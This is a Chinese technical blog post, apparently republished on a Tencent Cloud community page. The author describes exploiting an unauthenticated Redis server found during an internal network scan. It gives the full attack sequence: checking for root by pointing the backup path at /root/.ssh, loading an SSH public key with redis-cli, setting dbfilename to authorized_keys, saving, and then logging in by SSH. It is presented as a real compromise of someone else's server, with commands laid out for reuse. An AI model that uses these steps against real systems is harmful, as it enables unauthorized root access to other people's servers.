首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

redis未授权访问利用

在内网里面扫描,扫到一台redis未授权访问的服务器,这个网段是对外的网站服务器所在的网段,之前一直没有进去,这次比较巧合。

网上讲这个的文章很多,这里等于是实际操作了一遍。

首先在自己的服务器上安装redis。

wget http://download.redis.io/releases/redis-4.0.1.tar.gz 这里我下得版本比较老,问题不大

tar xzf redis-4.0.1.tar.gz 解压

cd redis-4.0.1

make

make install

安装完成以后

测试下 redis命令能否使用

直接能连接上。如果这时候要直接写ssh公钥就必须是root权限

怎么确定是root?

查看能否将备份路径设置为/root/.ssh

这样就是可以确定这是root权限我们可以通过写入公钥来拿下服务器。

原理是通过修改数据库的默认路径为/root/.ssh/和默认的缓冲文件authorized_keys,把缓冲数据保存在该文件中,这样就可以生成一个授权的key。

然后先在自己的机器上生成公钥

然后利用命令生成一个文本,将公钥文件中的内容写入其中。

cat /root/.ssh/key.txt | redis-cli -h xxxxxxxxx -p 6379 -xset aa

将文件写入目标主机的缓冲文件

通过get aaa查看缓冲内容

不要忘了改缓冲文件的名字, config set dbfilename authorized_keys

最后save 退出

在自己的机器上ssh连接即可

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20181211G1GO8800?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券